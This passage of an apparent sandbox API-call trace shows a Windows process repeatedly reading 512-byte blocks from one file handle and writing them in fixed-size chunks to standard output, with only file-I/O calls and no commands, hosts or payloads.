lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.797] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.797] GetFileType (hFile=0x4c) returned 0x1 [0111.797] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.797] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.798] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] 
GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] GetFileType (hFile=0x4c) returned 0x1 [0111.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.798] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] GetFileType (hFile=0x4c) returned 0x1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 
[0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] GetFileType (hFile=0x4c) returned 0x1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] GetFileType (hFile=0x4c) returned 0x1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.846] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.846] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.846] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.846] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.847] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.847] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.847] GetFileType (hFile=0x4c) returned 0x1 [0111.847] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType 
(hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.848] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.848] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.848] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.848] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.848] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.848] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, 
lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] GetFileType (hFile=0x4c) returned 0x1 [0111.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.849] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.849] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.849] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.850] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] GetFileType (hFile=0x4c) returned 0x1 [0111.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.850] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.850] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.850] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.850] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] GetFileType (hFile=0x4c) returned 0x1 [0111.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.851] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.851] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.851] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.851] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, 
